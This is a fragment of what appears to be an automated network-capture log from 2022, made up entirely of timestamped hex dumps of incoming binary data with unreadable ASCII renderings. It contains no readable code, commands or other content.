                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26200INData Raw: df 51 32 a5 4b 56 47 c3 3c 0b 3c 07 e5 a3 87 7a f1 26 a0 ab 3f 08 e4 40 bc 75 2a 67 db a2 c1 de f4 65 f6 1b 85 d1 bf 79 aa 47 bb ad f7 56 4d 37 10 77 2a 7a fe a0 50 92 9e 31 02 24 b4 e4 3a b2 30 41 95 72 15 2f 2c 3c 16 cf 40 1a 7a 7d 89 d1 b9 bb ab cd 07 70 71 96 ef 5c 10 61 77 e9 41 ba e8 d9 84 92 57 7d dc c3 58 48 85 2d 4c 1d b7 d4 b8 20 1a 6c 87 69 17 5e 26 98 d3 9c e9 50 ba e1 63 da db 2e ed 5c 4a 95 fe 15 02 d3 2e bd 22 03 d6 df 51 77 80 c0 98 79 d5 ac bb 9a 43 50 13 3f 96 8a 2c 3b db f5 09 07 b6 5e 38 62 96 a2 4a 48 24 5f 36 e4 fc 9a b1 e8 14 73 b5 ab 97 ba 97 d4 6f 88 cc 15 d9 d8 41 f9 41 81 7b e3 bb 62 e2 cb da 8b 5a b0 89 65 64 e3 ce e9 98 3e ec f7 b1 09 76 90 22 63 86 9f c1 fe 0f 2f 8c 41 73 9b 64 b2 a5 c7 53 39 d8 a0 da 91 85 3a d4 1f 2f 24 75
                                                                                                                                                                                                                                    Data Ascii: Q2KVG<<z&?@u*geyGVM7w*zP1$:0Ar/,<@z}pq\awAW}XH-L li^&Pc.\J."QwyCP?,;^8bJH$_6soAA{bZed>v"c/AsdS9:/$u
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26216INData Raw: 78 a0 ba 62 b2 8d e7 2b 0e 1e b2 d5 7d 1d e7 fa 6d 63 8f d7 f9 c5 9d 23 cf 3f d2 56 d9 56 49 ff 4c 28 10 ab 18 da 16 ae ed c3 d2 55 a7 9e ba 19 d8 0e 37 fd d1 2a 04 ab df 85 2a 50 1b 75 eb 60 6c 8a c7 3b 77 b9 88 de b9 ee 53 22 ba 40 78 d8 c3 31 f2 d8 72 fc d2 c2 2d 50 3d 47 8c de d2 ac 28 4a 34 4f 0c 79 ef 95 e2 ad 4a 31 60 81 2c f2 39 b9 00 94 a7 1e 9e 42 e4 7c a9 d9 da 31 be f6 8c aa 81 6a 91 ad 48 3a a6 c8 67 32 e1 bb 47 fe d0 0d be 1b 70 b6 d8 6c 7d 20 a9 03 07 88 e3 7b d0 ee 1f 03 15 53 6f 7d ea de 47 f5 9c df 47 8e 7b 69 a0 fa d2 57 2b c5 ba a5 da 46 a0 94 7b 4b fb 35 e3 6e 36 76 5e 6d 28 35 cd 1b 60 75 14 b6 46 b8 8a 55 6b 5e 22 ce 05 c4 12 60 f4 50 92 96 8e 8c 13 ab 14 40 99 00 fe ee 0a 91 fc cf 8b 94 85 ba 27 72 36 b2 89 bf e0 f9 29 99 5a 1b 9b
                                                                                                                                                                                                                                    Data Ascii: xb+}mc#?VVIL(U7**Pu`l;wS"@x1r-P=G(J4OyJ1`,9B|1jH:g2Gpl} {So}GG{iW+F{K5n6v^m(5`uFUk^"`P@'r6)Z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26232INData Raw: 42 bd 4b 23 b0 13 8f bb c8 cc 77 1c d7 5f 30 2b f2 19 63 0c b9 2f c4 a1 75 a7 d5 85 4a 81 c1 19 96 1c db 73 1b ba 82 32 e7 24 bb 06 ad 39 5a bf 67 10 a2 aa 4d 66 9b 5b 48 dd bd f9 ae f7 a1 d7 7b 90 7c 77 18 ac 01 b3 be ae d3 ab 98 6d e6 da 01 22 44 b0 77 af 51 9a f4 58 5d 91 97 58 0e da 5f 48 fa 42 5f cc 53 cd b3 78 5a 79 96 05 b6 20 0c d0 33 96 8a e6 89 09 f5 75 9c d7 c2 f7 98 23 7e 12 f4 a7 f8 2f 94 29 c1 d9 a5 c4 36 5b 20 6a 7a 1f f2 d8 af 6e e5 f6 19 05 9e 37 a2 67 97 5b 57 88 ca 04 e5 af 0d 48 ea 24 c4 f4 57 ab 6a 8a cc a7 d6 4a 83 17 9d fc 0a 41 92 79 69 8f 6c 1d 14 22 16 da be f3 89 4b 55 ac b2 2d 7f b9 36 c9 e0 ae 9b 3c b6 76 e6 45 85 d0 5f bc e0 7b 4c 49 a1 5c 3f 5f 6d 6d 18 f6 3c fd 06 47 92 e4 39 15 67 1b 73 5a 52 df be 4b 62 e7 46 65 5b f0 cb
                                                                                                                                                                                                                                    Data Ascii: BK#w_0+c/uJs2$9ZgMf[H{|wm"DwQX]X_HB_SxZy 3u#~/)6[ jzn7g[WH$WjJAyil"KU-6<vE_{LI\?_mm<G9gsZRKbFe[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26248INData Raw: 08 48 13 0f da 55 23 4c e2 8f 1b fb 94 6b 04 8f 93 32 1b 3a e3 62 5d 0a 28 ec ba fb f9 e3 b9 fd 02 cb 2b 7d 46 69 86 d5 44 a6 7a a7 ff b3 29 36 f4 67 9d 0a 99 7b 73 84 72 c0 cf 2c a5 72 20 51 bd a3 81 76 89 21 9a 5f 57 23 34 b5 d8 79 e8 4a 71 fd e0 66 ed 51 76 ae 0d 84 23 4e 61 77 50 cb 22 8b 8d 5c e0 ba 00 82 09 21 10 22 0d 7b d2 b6 f7 7a 4e e8 d5 e9 82 fa b5 4d 83 b7 13 c8 82 71 e7 37 af a7 6e 38 17 ea f6 ea 86 de a8 6d a7 cc cc 74 58 3b f2 26 30 40 62 03 0d 11 0d ef 35 e0 cb d7 e6 cd 78 53 4f ef a4 9d 17 2e 65 32 a6 04 68 66 16 ac fa 27 e3 59 7d 6a 87 e7 b1 b0 64 be 44 65 ce 4c 35 d8 02 c8 ad 86 97 07 b1 ef 5f aa 2d 97 27 cd 7e ad 30 a8 21 64 8a 23 fe 25 74 f7 7c fb be 5a 8c 49 a7 0d 43 20 8b 06 46 b6 96 8b 19 29 c3 45 e1 4a c1 2a 9a 63 2f eb e7 ce c5
                                                                                                                                                                                                                                    Data Ascii: HU#Lk2:b](+}FiDz)6g{sr,r Qv!_W#4yJqfQv#NawP"\!"{zNMq7n8mtX;&0@b5xSO.e2hf'Y}jdDeL5_-'~0!d#%t|ZIC F)EJ*c/
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26264INData Raw: d7 4c 26 6c e8 d0 80 eb a1 2f da 51 bd a9 47 f2 89 35 71 3e 84 cf 22 27 a3 4a bc a6 7d dc 8a df 1b 31 8e ad e7 fd 19 3e 8f 00 1c bd 34 2b de e7 f2 18 5b 70 21 e0 77 fb 69 4f 95 28 b3 0b 39 eb d8 0e fc 93 68 bc 9a c4 6f ec 80 3e fa c5 20 68 1f f8 12 c7 0d 99 8f c7 67 80 b2 58 93 45 c7 2f 62 3c 4e 4e 10 b9 e8 93 4d d3 87 73 6f 5b 65 e6 93 8c 79 5f e3 e1 ef 5a 18 46 84 aa 6d a4 f9 54 91 44 68 63 ce 42 19 fa 86 e5 6d eb 91 30 7f 73 56 43 13 ec 26 82 53 92 46 e0 8f 90 a1 41 e6 c3 fa 4f e2 22 d8 d1 37 51 bf cc 2b 91 15 c6 e3 b4 37 3b b4 e5 c2 47 30 54 8f dc d1 42 dd 72 2b 7b d3 be 50 56 fa 69 a3 6c 42 0e 1f 0a 6d 35 0f f1 55 e4 0f ee 60 08 e4 93 95 dc 54 b4 55 83 fe 64 68 82 bd dc d9 77 3e 8f 14 ac 05 93 7d a1 67 9e 63 b3 f0 c5 ef 9e b5 95 fd 58 45 cd a7 71 6c
                                                                                                                                                                                                                                    Data Ascii: L&l/QG5q>"'J}1>4+[p!wiO(9ho> hgXE/b<NNMso[ey_ZFmTDhcBm0sVC&SFAO"7Q+7;G0TBr+{PVilBm5U`TUdhw>}gcXEql
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26280INData Raw: 92 c5 45 1c 85 65 34 5f 35 0a 97 4e 77 79 2f 50 db 8f a0 61 24 5a 38 bc d1 f1 1e 26 0c 99 2e d3 f1 5f e8 97 1f 84 f9 82 8f 86 a8 c9 a6 3b ff 27 ca 9a 57 7c 29 ed 03 94 10 1b 0c f3 77 2b ab e6 f4 9d 67 00 05 75 30 9b 89 9d 40 b1 ae e8 00 cb dc 9f f4 82 86 56 09 cd 71 b3 eb d1 78 81 9b 3f 9f b1 7e cc b6 54 99 27 3e 61 bc d1 f2 79 22 d5 82 3a 22 98 ef 64 c7 cb 87 e7 ae d4 0e 4d 8b e0 c1 db 02 e4 66 1a 67 93 4c 7b 1a c5 92 22 a2 48 b8 27 b6 bb 42 2d 35 b1 da 80 1a 6d 8e 48 43 7f 46 98 82 67 3d 76 9e 49 e8 d2 74 bd a0 c2 0f 13 c7 d5 b3 5b 35 18 8e 6c 12 c0 15 82 c4 32 15 c6 af 30 1f 30 87 11 61 62 cc fe 48 99 e0 c9 84 31 c1 93 34 ab 0b e5 e3 b9 27 e6 6c ea 35 1d 04 45 b5 ce 3a 5d a0 55 e1 21 01 9f b7 bd 5c aa 31 09 36 4a 87 22 db d1 da 2d 35 a8 ca 28 9d 11 04
                                                                                                                                                                                                                                    Data Ascii: Ee4_5Nwy/Pa$Z8&._;'W|)w+gu0@Vqx?~T'>ay":"dMfgL{"H'B-5mHCFg=vIt[5l200abH14'l5E:]U!\16J"-5(
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26296INData Raw: d2 b7 a7 2c 9d 9b 2b e8 70 36 d6 e8 fc 58 d5 be 80 17 47 e6 28 a3 9a de c0 97 11 47 b5 37 f0 21 ee b6 02 bc 97 5b 74 1b 63 3a 2d 22 e5 94 be b6 a9 33 17 5c ae 35 c9 7e 62 f2 ce 21 a3 10 e8 d1 a1 1b 19 e9 35 ad 1d 1f 35 02 07 c7 7d 51 f0 66 0d 03 27 39 b6 15 d0 a2 56 47 2b a2 96 72 e6 ea ae 0b a5 5d da ca d7 f2 27 d1 b7 2d f5 99 cc 34 71 f7 44 3e 2d a3 9e 17 28 c6 d4 98 d2 0d 31 b1 0c c9 67 1a 2e 16 6b 90 a3 38 b9 74 bd fb 2b 03 7d ad aa 89 96 c8 71 27 d1 6f 66 02 be ee c8 e7 ba e4 2c fd 0a eb e6 9a 16 a9 d2 e1 f5 86 66 98 8a 30 8e 5d 53 71 eb f3 2f 8d 7b 83 31 a2 bd 93 40 3a 91 b9 ac 69 ef 47 f3 51 76 32 cd ac d5 c2 19 00 8d 79 49 e7 45 71 10 20 c4 3d 62 4d df 7b 40 67 10 99 72 bc 0d ee b2 49 ac 5a a0 11 3a b2 fd b4 fa 80 0f 31 1d bd fc 36 c2 e7 af 2f b2
                                                                                                                                                                                                                                    Data Ascii: ,+p6XG(G7![tc:-"3\5~b!55}Qf'9VG+r]'-4qD>-(1g.k8t+}q'of,f0]Sq/{1@:iGQv2yIEq =bM{@grIZ:16/
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26312INData Raw: f4 5e 14 f2 a4 a1 56 11 2b 7b 80 4c 50 cd 12 44 d5 58 71 35 f4 6c 0f e4 3a 0e 43 d4 57 f0 a2 db b8 f0 82 e6 dc 6d 23 d3 90 32 a7 9f f0 1c c9 d6 a9 01 94 b3 13 d0 d9 2e 43 06 dd c6 4e 59 d5 29 47 8f de 31 25 2d 80 f1 03 49 12 85 35 fd b8 74 86 b7 7e b0 93 cf 42 9c cc 64 7a 48 c9 41 d1 7c 39 63 b3 01 00 99 54 12 77 c9 00 c4 5b 0a f9 2d 9a a7 df b9 f9 5a 19 ff 5f 0d 0a 32 37 ca 4f f8 20 d3 1e 57 72 10 37 9a 2d 53 72 07 eb 91 10 dc 74 e6 21 ee 9c a4 c0 c4 45 a3 8d 6d 51 09 9f fb 21 6a cb 6b 19 72 37 d8 b1 ed 47 24 1f 95 e7 42 4a 7a b1 0c e4 b5 a2 1a 73 d9 21 1e e2 85 ec e0 3f 14 90 d9 fe 8b 10 95 ff 0c 56 53 21 ce 9b e4 d4 32 f6 87 07 b0 ec a9 60 49 b9 e9 a6 58 5d ab f0 d8 58 47 24 0d 44 17 75 5c dc f3 8e 6b 55 9c a8 0f c5 a7 4e 78 a6 77 12 44 51 bd a3 39 74
                                                                                                                                                                                                                                    Data Ascii: ^V+{LPDXq5l:CWm#2.CNY)G1%-I5t~BdzHA|9cTw[-Z_27O Wr7-Srt!EmQ!jkr7G$BJzs!?VS!2`IX]XG$Du\kUNxwDQ9t
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26328INData Raw: 1c e5 e0 48 ec ec 86 8e cd 5a d0 82 7d 8a e7 c4 92 4b 35 60 c1 12 88 ff 06 f5 94 09 36 28 05 eb db 99 20 79 95 73 e5 97 75 8a 21 96 45 d4 8b 0e e0 c0 3b d6 a9 58 73 ef 9e a5 1b ac c6 02 f1 50 f8 a6 53 da c8 2c a9 d7 b1 df 41 5c 72 92 30 64 6c 2d 05 eb bd ef a2 fb 97 e8 a9 9d 0d 25 5c 1f 17 85 3f 0d 83 2a db 39 44 15 b2 02 5f 2b ff ab ff 39 e5 6f 95 74 65 d3 d0 cf 5b a1 7e 7a 6d ef 91 65 fd 53 87 d0 03 4c 62 b3 a4 1f 6a 8c 69 e5 05 3e b4 a5 53 21 10 86 db c0 41 23 b2 01 de 87 a2 64 fe 92 ef 30 6d ec 19 04 78 35 48 05 28 64 6f b9 5f e9 a5 00 74 06 01 a6 10 61 7f 6b d5 32 d7 c5 3d 27 5d c3 2f 8c 44 fe 62 62 7d 43 be 99 3e 21 de 4f c4 75 4f f9 a7 fb 19 e8 f5 a0 dd 08 ba b0 c4 32 17 67 d6 ea 17 19 2d 46 e6 10 8d db 9d 8a 90 f3 87 95 b0 f9 90 31 ba 48 a8 50 51
                                                                                                                                                                                                                                    Data Ascii: HZ}K5`6( ysu!E;XsPS,A\r0dl-%\?*9D_+9ote[~zmeSLbji>S!A#d0mx5H(do_tak2=']/Dbb}C>!OuO2g-F1HPQ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26344INData Raw: f3 14 8c 54 ff c2 e0 f8 c4 0a 81 8e b1 db 2a b6 5d f1 6b d3 b9 ea 3b 42 fc 7d 3d b3 d7 eb 54 6c 10 28 0b ea 68 2f b3 06 df 25 a9 f8 e5 e9 95 95 ae b1 a1 bc 6d 64 b9 a4 7c 72 2c 19 5c ae 59 cd bf 41 45 67 7b 70 0c 3a 37 b9 fa d1 97 48 96 4b 54 a6 85 4e 7d 2d fd 21 e6 48 56 f5 50 ca 46 7e f0 4f 74 12 18 4b e0 e2 fd ec 3b d5 59 00 8f e8 1d 0a d4 0b 09 e3 7b 50 e1 44 20 d2 65 63 d8 03 ca 67 29 61 c0 4c 89 07 d6 99 a0 dc 69 50 2c 59 f7 75 82 f5 4b a6 d2 20 dc 4b 3c af 19 48 d4 13 c1 c9 5a 8a 4d 9b 5c 83 e2 43 b0 c9 da 79 95 b7 54 42 82 85 f8 e5 6b 15 a3 96 19 09 43 29 54 6d a4 01 2a 0e ce 61 c8 dc 7c e7 76 51 55 e7 7d 78 89 4f f4 53 2a a6 ac cf 26 5b 5c 40 46 a4 a9 97 02 1c 27 ac 79 a2 69 07 f3 ab bf 48 96 60 b2 5e 85 74 11 51 a6 aa d3 e8 c0 4b 5d 8b f1 93 7e
                                                                                                                                                                                                                                    Data Ascii: T*]k;B}=Tl(h/%md|r,\YAEg{p:7HKTN}-!HVPF~OtK;Y{PD ecg)aLiP,YuK K<HZM\CyTBkC)Tm*a|vQU}xOS*&[\@F'yiH`^tQK]~
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26360INData Raw: 64 e6 6b ed b5 a6 ef 3e 13 48 59 26 af 95 6a 8c 0e 8a 28 ba 09 28 26 7b 24 12 0a 65 f9 32 b4 82 83 04 71 07 a0 25 2c 99 4e 9e ab fd 4c 82 0a bf 5c 33 df e4 bb a4 10 c3 65 39 b6 0d 6a 6d 65 ae 37 44 ab 94 a0 1f 84 fc 76 e4 57 fd 27 4d 73 8b f6 e9 a4 fc b8 0e 1c 26 38 44 e8 4d 08 e8 b5 a5 d5 67 d6 4c 22 12 e0 4a a1 7d 10 37 13 9d a6 99 22 dc bd cc 27 58 8d 54 92 9a 79 8c 17 98 1b 3f bc 25 12 2b d7 07 fb fd 5a 25 5b 95 53 00 a7 04 d3 de 36 10 4a f6 74 29 6d c1 e8 2f 70 85 c3 a6 9e 69 ef dd 91 7b 8e ad cd 61 7e 9b ff 9f 4b ab 6d 34 d4 b0 7e 3c 67 93 0a 52 0d 76 20 15 14 3e 15 f1 f1 3e 55 89 bd 29 af 73 e5 0c 4a 6e a0 45 49 45 7e b3 6e 8e 41 1b 9d 94 db 07 c4 6e f8 b1 54 21 18 64 92 18 eb 08 51 e8 fb 9e a0 0f c9 77 73 1c 02 1e d5 2d 68 3b 4e 1c 42 27 85 ab 80
                                                                                                                                                                                                                                    Data Ascii: dk>HY&j((&{$e2q%,NL\3e9jme7DvW'Ms&8DMgL"J}7"'XTy?%+Z%[S6Jt)m/pi{a~Km4~<gRv >>U)sJnEIE~nAnT!dQws-h;NB'
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26376INData Raw: 5a 20 71 a8 af c8 39 6b bf e6 96 b4 fa 8e fc c9 d5 0d 12 93 12 37 51 07 f4 db 43 f8 a7 1d 23 70 d8 4a 7a e0 27 81 98 a0 a6 00 f3 d9 ab 73 f0 78 c9 9b 05 23 dc 12 16 66 7f f4 60 ab d9 cc f6 4d 59 a2 ea a4 a7 dd 65 da d3 72 67 da 37 45 ac 9f 4a fb d2 0f 6e 29 bb 63 73 84 bd 88 ef 1b 1a 47 07 87 dd 27 44 95 21 78 ab 48 29 42 0f fb 36 b8 0e f1 fa 1a c4 14 14 7e c4 b8 ec 3d cf b2 8f 57 ca 8d 86 3b 8c 9f 73 05 ce ca ce 24 f8 3c 3e ec 2b 53 32 38 c4 82 cc 4c f2 99 7a 1e 63 7b fc 08 57 b4 cb 34 10 26 f7 86 60 f7 17 7e 74 30 59 79 4d 64 fe ed 02 51 59 27 ad ae 01 c9 98 d2 a0 58 ed 9d 27 64 a2 7a e6 6c cd 9b 8f b6 ad b2 5a a9 b6 3c 0e 94 f8 d5 39 49 26 d8 34 a9 21 db 16 0c 00 67 6a c6 6a 1c 72 5b c5 80 3d 76 fa f9 c4 fb 02 fa db 29 0c d3 36 97 25 ee 93 fc 72 c7 34
                                                                                                                                                                                                                                    Data Ascii: Z q9k7QC#pJz'sx#f`MYerg7EJn)csG'D!xH)B6~=W;s$<>+S28Lzc{W4&`~t0YyMdQY'X'dzlZ<9I&4!gjjr[=v)6%r4
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26392INData Raw: 4c 8e d2 20 92 fc e7 90 cd aa f2 13 e9 f7 1c e6 7d df be 29 e8 96 60 b1 87 10 b5 a2 18 bb 91 40 37 fd a5 ca 32 56 a9 ca 86 0d c7 bc 33 b8 80 6d 5c ab 46 ee f0 87 cd e9 7f 6d 11 77 50 be a0 57 5a 79 71 fd 9d 4e 2d 33 95 c0 ae 56 a6 99 fc d6 27 90 08 c3 d2 9c 67 fb 86 ad 7e 46 ed 23 04 2e 23 90 fd de 58 51 71 1b 29 d2 56 6b fb 05 d3 ae 8a c4 32 4e 09 08 7f 82 d1 8e 8d 49 54 af 83 8a 42 c9 98 94 01 54 59 b3 dc e5 5f 5f 41 4e a5 20 32 a5 74 47 a2 cb 11 67 98 b1 28 2f 0e 84 e6 1a 96 66 c7 e3 18 d0 13 e0 79 f2 65 e6 45 54 b1 47 cf 4b 6d 0e 1a 2a eb 7c 4d 1c 25 1d 56 5a 12 6e 65 51 fb bf bf 5e 98 64 8f 4e fa df 60 ce 5e b3 39 80 b5 66 f7 44 45 8a 9e 30 53 22 a3 1d 6e d7 bc ae 26 30 08 d7 ba a9 27 27 28 86 c4 36 56 8c f3 36 99 7e a8 12 46 df da e7 5f fa b2 74 b6
                                                                                                                                                                                                                                    Data Ascii: L })`@72V3m\FmwPWZyqN-3V'g~F#.#XQq)Vk2NITBTY__AN 2tGg(/fyeETGKm*|M%VZneQ^dN`^9fDE0S"n&0''(6V6~F_t
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26408INData Raw: 18 ec 3e 11 cb 5b 53 96 c7 50 61 34 78 e5 d2 8d c3 d9 16 64 57 a7 e9 35 d8 40 b2 33 be a2 24 f7 74 66 51 dd 8c 74 2b e6 5d 48 53 ca 42 59 a2 a3 fc 6a 9f fb 56 ad 74 d2 b6 4e e4 b5 e1 e9 b0 fc f6 16 c1 ec c2 d7 66 eb 1c 27 26 86 4b b2 ed 33 81 25 72 5a 26 8c 16 08 a7 24 7f 92 ab 38 3b 98 8a c8 88 a6 89 bb 4a da 17 21 e8 33 77 e7 05 0b 02 cd 69 5d 17 26 ee 71 e2 bf e4 a7 5c 96 80 28 5b 81 be a1 a3 c0 f7 90 14 ae e9 33 cb f8 9f 86 63 cb bb 2f f6 f3 d7 ab 5a e7 3d 33 30 99 9c 23 17 38 27 98 d3 2a 3f 71 60 d3 37 c3 26 af ca 9b e9 de af 7a d2 b9 62 cb 89 45 95 60 93 85 bd 04 42 66 bb e5 96 90 70 30 ae d7 20 41 93 2e ec 55 90 72 ef 5c 4f 23 ac fd 1e 97 7e 5b 94 96 17 e2 e6 3c cf ac ce 44 dd 07 c3 08 e0 bf 9e 5e 2b 39 74 08 55 3f e2 af e8 62 8f d9 17 21 07 33 c2
                                                                                                                                                                                                                                    Data Ascii: >[SPa4xdW5@3$tfQt+]HSBYjVtNf'&K3%rZ&$8;J!3wi]&q\([3c/Z=30#8'*?q`7&zbE`Bfp0 A.Ur\O#~[<D^+9tU?b!3
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26424INData Raw: 05 d0 09 fc 20 26 ff da d6 bf b3 1c 9f c4 f4 85 f2 b2 b9 42 c7 18 3d 01 c9 00 a4 99 80 3b ca 66 69 73 f1 4f 94 c0 6a cb d4 8b d2 26 78 b9 61 4e 81 b1 3e d6 a4 c3 99 a2 51 3b b8 ca f3 fe bb b3 46 04 64 ff 1c 57 e3 a6 07 2a 4d 90 3b d6 d2 d2 63 20 92 42 f9 18 6b 44 62 d5 ea 92 6f 4b 87 dd 35 cd 2b 4b 79 dc 58 84 7e e0 52 30 e1 5e 31 38 be 1d f5 f3 61 01 ec e5 87 2a 88 7b d0 e2 5f 13 ed 6e bc 78 61 76 2b 4d 23 f8 b9 c6 25 96 33 24 65 c3 cf 32 b0 e6 44 6d 7f 4c ec 9e 8f 54 91 90 b8 05 de 72 4b c4 b6 02 ee 68 2c 2d 92 56 58 2f c0 25 ba fc 29 25 90 01 28 8b c0 c8 f5 e4 13 04 3b b3 64 b3 f3 b4 be 23 d1 f4 8c 0e c2 f6 43 95 67 6d f9 a8 78 41 6f ed 1d 3a 8d ab 2b 27 6d 36 4a 45 e9 dc a5 17 20 f6 ed e7 5f eb c9 8e 23 6d 14 86 13 0b 53 db ed f8 d3 45 64 27 b1 30 c0
                                                                                                                                                                                                                                    Data Ascii: &B=;fisOj&xaN>Q;FdW*M;c BkDboK5+KyX~R0^18a*{_nxav+M#%3$e2DmLTrKh,-VX/%)%(;d#CgmxAo:+'m6JE _#mSEd'0
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26440INData Raw: 59 25 a6 90 44 a4 83 fe 77 94 68 9d e7 d4 81 0d ab 50 8c 4e 8e 4a 56 69 72 e4 09 41 40 88 c5 f1 aa d9 a4 08 46 56 b8 d1 ec 6a 54 2e 4a cc a8 0f f1 c2 3b d2 30 43 7f b1 2e 2f 05 ae a0 4d 17 26 fe 82 9a e7 f1 2e aa 61 0c 43 60 cf ae 44 e5 6b 74 6b d7 76 94 11 d2 46 3c 4a f8 6d a4 5b 51 cb 5f d1 25 b1 a7 c3 eb 7e 45 95 6f 97 17 a2 65 2f d3 56 e0 68 c3 42 a3 16 39 68 04 2b f9 75 fe c7 4e 15 53 a2 10 fe cd 2a 21 62 af 67 a8 da 63 ed 50 05 3b a6 e3 c9 ab d7 5c da 9b 79 df 66 dc 5e ce 61 2c b7 00 61 b7 7c 57 7a 17 a8 34 50 7e 78 19 c4 7a 0f f6 3f 55 a8 85 2d f5 c6 e2 4a 7b c8 27 05 cf 39 31 8f 4a aa 60 7b e5 5f 51 c5 df fc a0 09 09 e9 9d 75 74 f6 ae c9 35 77 96 5c b8 d0 8b 80 46 53 4a 7c da 77 4a 95 ea 5a 12 4b a8 34 35 ca 97 f6 96 ba e3 27 03 af 8b da be 66 a1
                                                                                                                                                                                                                                    Data Ascii: Y%DwhPNJVirA@FVjT.J;0C./M&.aC`DktkvF<Jm[Q_%~Eoe/VhB9h+uNS*!bgcP;\yf^a,a|Wz4P~xz?U-J{'91J`{_Qut5w\FSJ|wJZK45'f
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26456INData Raw: ac f8 b6 0a ad c0 80 3f d0 c5 36 9f 0f ab 12 fd cc e1 f7 04 bc 58 90 f1 3d 57 8c 6a 15 ff 0b 55 45 d0 19 58 62 7f 24 fa 4b e9 29 f6 32 24 fe 70 09 58 b9 f0 03 a6 43 42 5e 29 e5 c1 4d 28 34 d3 16 40 0e 7d 23 9f 7b 26 71 83 ab 7e c0 5a 43 ed a0 2f c3 40 bd c4 10 4a b1 77 a0 17 93 7a f8 79 bb f9 cd 4e 00 6e 21 f5 ef e0 1a b3 ba f6 fe e3 48 3b af 68 16 c6 12 29 fe 63 2f 73 12 cc f2 1a 8a 47 26 f7 f1 60 fa 59 aa 17 1c 41 30 df d8 fc d9 65 eb a1 4d 88 b7 dd b3 24 a8 9f e9 b9 85 72 53 47 45 3c fe 50 43 33 e4 ff 34 60 16 43 c0 bd 84 3c 10 c1 50 57 29 8d ec d1 f5 cd eb ba 0f 2d a8 f0 e5 1b 48 36 b2 08 33 ae 61 e8 cc 22 ba 57 a0 5f a9 43 ea fd 5d d2 3d 0d 9b 55 f0 2f 86 13 d2 d1 8e fa b9 7d 6b c4 71 58 06 6d 78 24 9d b8 b9 57 4a d7 80 ac af ab d3 3f be b3 c4 d9 1c
                                                                                                                                                                                                                                    Data Ascii: ?6X=WjUEXb$K)2$pXCB^)M(4@}#{&q~ZC/@JwzyNn!H;h)c/sG&`YA0eM$rSGE<PC34`C<PW)-H63a"W_C]=U/}kqXmx$WJ?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26472INData Raw: d1 d3 da 2c d6 87 b8 1e 03 f4 5a 95 b8 0b 43 97 1e 8b 59 ba 81 07 d3 c0 c5 85 9f 13 ac 8b 8e f0 1e 28 7b 27 8c 79 d7 5f 49 71 55 f5 91 c5 02 8a b2 db 2b 91 3c 11 6d 36 2d 3f 76 b8 3a ba e1 c6 0c fd 47 98 da e0 7b 66 58 c9 7a 23 9c 77 28 c6 7a b1 dd 4a bf e3 ae 1b b0 01 9e 7f ec 8e 9f 5d d5 81 da 76 39 c8 73 41 ba 0b 6e ec 5a 24 48 41 fb 7d ff 28 e5 53 f6 54 a6 66 5a ec 08 ba 26 30 4b b7 2e f3 0c bf 1e f2 2f 3d 4c 8d 28 24 19 67 ee 56 3c e4 17 dd 35 14 78 ea 64 88 c6 bb 64 33 b2 87 51 72 25 23 96 20 d8 0f 73 b1 ce dd 54 a2 5c 7f b6 50 d9 70 36 9f b4 8e a0 30 7f ac 58 88 be 8c c8 92 56 0f cf 0f 8a c1 52 9f 8d de 94 3e 1d 94 08 7a 31 36 07 d4 a9 0d be a5 1c 41 a6 97 20 a6 1c 77 f8 35 17 18 51 2c 91 c0 63 25 d9 b6 41 80 99 4e e9 ee 0f b1 c0 5b 8a be 3f bf d3
                                                                                                                                                                                                                                    Data Ascii: ,ZCY({'y_IqU+<m6-?v:G{fXz#w(zJ]v9sAnZ$HA}(STfZ&0K./=L($gV<5xdd3Qr%# sT\Pp60XVR>z16A w5Q,c%AN[?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26488INData Raw: 45 18 24 20 96 cc 71 25 58 40 f6 c7 2a 65 e8 34 07 ff 42 2e 4a c7 e8 e6 aa 8f 75 54 85 6b 67 ef 20 0e ae f5 34 90 eb e0 74 a6 d6 5b 22 bc 39 e2 b1 be c8 f1 d3 8b b3 b5 22 3a e7 17 23 c6 c6 73 90 2e 83 5b d7 e1 cc 7c 4e db 52 13 26 bd 32 3a b6 d9 51 28 d4 54 38 0c 25 13 d1 b5 36 4f ca bf f6 bd c5 98 61 d1 2d 7f 33 10 36 bd 5e aa 46 18 0c 22 52 f7 ac 7b 2d c2 ff 2f 1a 05 2b e0 07 b2 82 10 20 10 be 8a 1f 18 3f 11 1f 28 c6 06 64 07 d8 39 63 8d ca a1 42 e1 12 62 33 86 88 9d f1 f1 53 70 b2 a9 1b ba a5 4e 59 96 fc c4 68 90 50 ff eb d9 47 07 99 ff e9 8e a1 51 b6 44 36 64 55 45 1c 8f 18 b7 4e 13 5d 35 99 00 f8 c5 f4 21 be 42 fc 7e c6 23 f9 db 8e fd b9 77 86 0f 6c 86 48 0a 06 be 33 25 8c e4 a2 18 b8 b4 d9 f7 f4 04 f3 e4 56 d7 04 40 db 7d 1e 79 9c 6c 0d 34 7d 5b f8
                                                                                                                                                                                                                                    Data Ascii: E$ q%X@*e4B.JuTkg 4t["9":#s.[|NR&2:Q(T8%6Oa-36^F"R{-/+ ?(d9cBb3SpNYhPGQD6dUEN]5!B~#wlH3%V@}yl4}[
